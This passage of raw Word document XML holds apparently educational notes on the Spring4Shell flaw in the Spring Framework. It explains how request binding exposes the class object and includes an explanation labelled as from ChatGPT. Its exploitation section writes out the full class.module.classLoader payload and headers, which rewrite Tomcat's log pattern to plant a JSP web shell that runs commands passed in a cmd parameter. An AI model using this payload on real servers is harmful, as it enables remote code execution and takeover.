        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FC86048" w14:textId="35227A68" w:rsidR="000613E1" w:rsidRDefault="000613E1" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06BEAFDE" w14:textId="5C6D8115" w:rsidR="000613E1" w:rsidRDefault="000613E1" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67A3D12E" w14:textId="77777777" w:rsidR="000613E1" w:rsidRDefault="000613E1" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23C95FB8" w14:textId="77777777" w:rsidR="000613E1" w:rsidRDefault="000613E1" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A234C08" w14:textId="77777777" w:rsidR="000613E1" w:rsidRDefault="000613E1" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4835BA3D" w14:textId="77777777" w:rsidR="000613E1" w:rsidRDefault="000613E1" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FFDEDA0" w14:textId="503694F2" w:rsidR="000613E1" w:rsidRDefault="000613E1" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000613E1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>After that, the developer usually creates a request builder for the trade controller, which allows the web user to access the trade object remotely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FCD923" w14:textId="611A41C1" w:rsidR="000613E1" w:rsidRDefault="000613E1" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3DB9E1DE" wp14:editId="01D30742">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-541020</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5080</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7067550" cy="457200"/>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67550" cy="457200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="116AB8FC" w14:textId="475983FF" w:rsidR="000613E1" w:rsidRDefault="000613E1" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5029A347" w14:textId="7DC902A2" w:rsidR="000613E1" w:rsidRDefault="000613E1" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2376F644" w14:textId="17BCD62D" w:rsidR="000613E1" w:rsidRDefault="000613E1" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000613E1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>When web users access trade object properties, the binding process (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000613E1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>bindRequestParameters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000613E1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">) in the Spring framework implementation will call the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000613E1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>getCachedIntrospectionResults</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000613E1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> method to get and set the object property in the cache. However, the return object of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000613E1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>getCachedIntrospectionResults</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000613E1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> method includes a class object. This means that web users can get a class object remotely by simply submitting a URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427137FE" w14:textId="0C7DD53B" w:rsidR="000613E1" w:rsidRDefault="000613E1" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5269F6A0" w14:textId="400AEC2F" w:rsidR="000613E1" w:rsidRDefault="000613E1" w:rsidP="006838A8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6755F22E" wp14:editId="66B17EBC">
            <wp:extent cx="1828800" cy="4191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419100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EE4716" w14:textId="7DD71F03" w:rsidR="000613E1" w:rsidRDefault="000613E1" w:rsidP="000613E1">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000613E1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>In web applications that use the Spring framework, when a user accesses certain properties of a "trade" object through the web interface, the Spring framework uses a process called "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000613E1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>bindRequestParameters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000613E1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>" to set the values of the object properties based on the user's input. During this process, the framework calls a method called "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000613E1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>getCachedIntrospectionResults</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000613E1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>" to get information about the object properties, and this method returns an object that includes information about the class of the object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CDB3E5" w14:textId="2E7B3122" w:rsidR="0039004D" w:rsidRDefault="0039004D" w:rsidP="000613E1">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4718B021" w14:textId="1D3EE01E" w:rsidR="0039004D" w:rsidRPr="000613E1" w:rsidRDefault="0039004D" w:rsidP="000613E1">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>CHATGPT explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D29FCBE" w14:textId="77777777" w:rsidR="000613E1" w:rsidRPr="000613E1" w:rsidRDefault="000613E1" w:rsidP="000613E1">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AB6A1E3" w14:textId="77777777" w:rsidR="0039004D" w:rsidRPr="0039004D" w:rsidRDefault="0039004D" w:rsidP="0039004D">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039004D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Imagine you have a website where people can trade stocks or currencies. To make this work, the website needs to have a way to collect information from the user about what they want to trade. This information is then used to create a "Trade" object which holds all the details of the trade.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6D4C64" w14:textId="77777777" w:rsidR="0039004D" w:rsidRPr="0039004D" w:rsidRDefault="0039004D" w:rsidP="0039004D">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B188ABE" w14:textId="77777777" w:rsidR="0039004D" w:rsidRPr="0039004D" w:rsidRDefault="0039004D" w:rsidP="0039004D">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039004D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>When someone visits the website and enters their trade information, the website uses something called the Spring framework to process that information and create a Trade object. This process is called "binding".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578F82F3" w14:textId="77777777" w:rsidR="0039004D" w:rsidRPr="0039004D" w:rsidRDefault="0039004D" w:rsidP="0039004D">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="379F7BA5" w14:textId="77777777" w:rsidR="0039004D" w:rsidRPr="0039004D" w:rsidRDefault="0039004D" w:rsidP="0039004D">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039004D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>However, there is a vulnerability in the way the Spring framework is implemented. This vulnerability means that if someone knows how to exploit it, they could potentially get access to the Trade object and all its properties (like the type of trade, the currency, etc.) remotely, without even having to go to the website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C573AD6" w14:textId="77777777" w:rsidR="0039004D" w:rsidRPr="0039004D" w:rsidRDefault="0039004D" w:rsidP="0039004D">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3979120A" w14:textId="77777777" w:rsidR="0039004D" w:rsidRPr="0039004D" w:rsidRDefault="0039004D" w:rsidP="0039004D">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039004D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>This vulnerability is caused by a method called "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0039004D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>getCachedIntrospectionResults</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0039004D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>" that the Spring framework uses during the binding process. This method returns an object that includes information about the Trade object, including its class (which is a type of object). This means that someone could submit a specific URL and get access to the class object remotely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B5CB7E" w14:textId="77777777" w:rsidR="0039004D" w:rsidRPr="0039004D" w:rsidRDefault="0039004D" w:rsidP="0039004D">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="514FB9E2" w14:textId="1F422A7B" w:rsidR="0039004D" w:rsidRDefault="0039004D" w:rsidP="0039004D">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="486474F1" w14:textId="0CB62B29" w:rsidR="0039004D" w:rsidRDefault="0039004D" w:rsidP="0039004D">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Exploitation of the vulnerability: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A26B75" w14:textId="0A53FF31" w:rsidR="004F4F3D" w:rsidRDefault="004F4F3D" w:rsidP="004F4F3D">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5371BD56" w14:textId="56AF6836" w:rsidR="004F4F3D" w:rsidRDefault="004F4F3D" w:rsidP="004F4F3D">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Use exposed class to modify tomcat log configuration file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223DD3D5" w14:textId="28D06870" w:rsidR="004F4F3D" w:rsidRDefault="004F4F3D" w:rsidP="004F4F3D">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Remotely upload a JSP web shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E435911" w14:textId="1C9533C0" w:rsidR="004F4F3D" w:rsidRDefault="004F4F3D" w:rsidP="004F4F3D">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Execute commands via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>urfile.jsp?cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ur</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> command here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188338B3" w14:textId="041CED77" w:rsidR="0039004D" w:rsidRPr="004F4F3D" w:rsidRDefault="0039004D" w:rsidP="0039004D">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B40BC9">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Payload:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00853BA7" w:rsidRPr="00B40BC9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{</w:t>
      </w:r>
      <w:r w:rsidR="00853BA7" w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>c2}i if("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00853BA7" w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>j".equals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00853BA7" w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00853BA7" w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>request.getParameter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00853BA7" w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00853BA7" w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00853BA7" w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">"))){ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00853BA7" w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>java.io.InputStream</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00853BA7" w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> in = %{c1}i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00853BA7" w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>in.read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00853BA7" w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">(b))!=-1){ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00853BA7" w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>out.println</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00853BA7" w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>(new String(b)); } } %{suffix}i&amp;class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&amp;class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&amp;class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&amp;class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CE9A96" w14:textId="4A2AC01D" w:rsidR="00853BA7" w:rsidRDefault="00853BA7" w:rsidP="0039004D">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Headers: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E179FE" w14:textId="77777777" w:rsidR="00853BA7" w:rsidRPr="00853BA7" w:rsidRDefault="00853BA7" w:rsidP="00853BA7">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00853BA7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>"suffix": "%&gt;//",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2211F5E5" w14:textId="77777777" w:rsidR="00853BA7" w:rsidRPr="00853BA7" w:rsidRDefault="00853BA7" w:rsidP="00853BA7">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00853BA7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">            "c1": "Runtime",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261305E5" w14:textId="77777777" w:rsidR="00853BA7" w:rsidRPr="00853BA7" w:rsidRDefault="00853BA7" w:rsidP="00853BA7">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00853BA7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">            "c2": "&lt;%",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D5E268" w14:textId="77777777" w:rsidR="00853BA7" w:rsidRPr="00853BA7" w:rsidRDefault="00853BA7" w:rsidP="00853BA7">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00853BA7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">            "DNT": "1",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65190062" w14:textId="225B7CCF" w:rsidR="00853BA7" w:rsidRDefault="00853BA7" w:rsidP="00853BA7">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00853BA7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">            "Content-Type": "application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00853BA7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00853BA7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A29672" w14:textId="38CAD795" w:rsidR="00853BA7" w:rsidRDefault="00853BA7" w:rsidP="00853BA7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58BD320A" w14:textId="2ACFE08D" w:rsidR="00853BA7" w:rsidRDefault="00853BA7" w:rsidP="00853BA7">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload explanation: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BB9CCA" w14:textId="77777777" w:rsidR="00853BA7" w:rsidRPr="00853BA7" w:rsidRDefault="00853BA7" w:rsidP="00853BA7">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00853BA7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>This payload is attempting to exploit a vulnerability in the Spring Framework by modifying the Tomcat log configuration and remotely uploading a JSP web shell to the server. The payload is passed as a value for the "pattern" parameter in the HTTP request headers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7AEA2B" w14:textId="77777777" w:rsidR="00853BA7" w:rsidRPr="00853BA7" w:rsidRDefault="00853BA7" w:rsidP="00853BA7">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
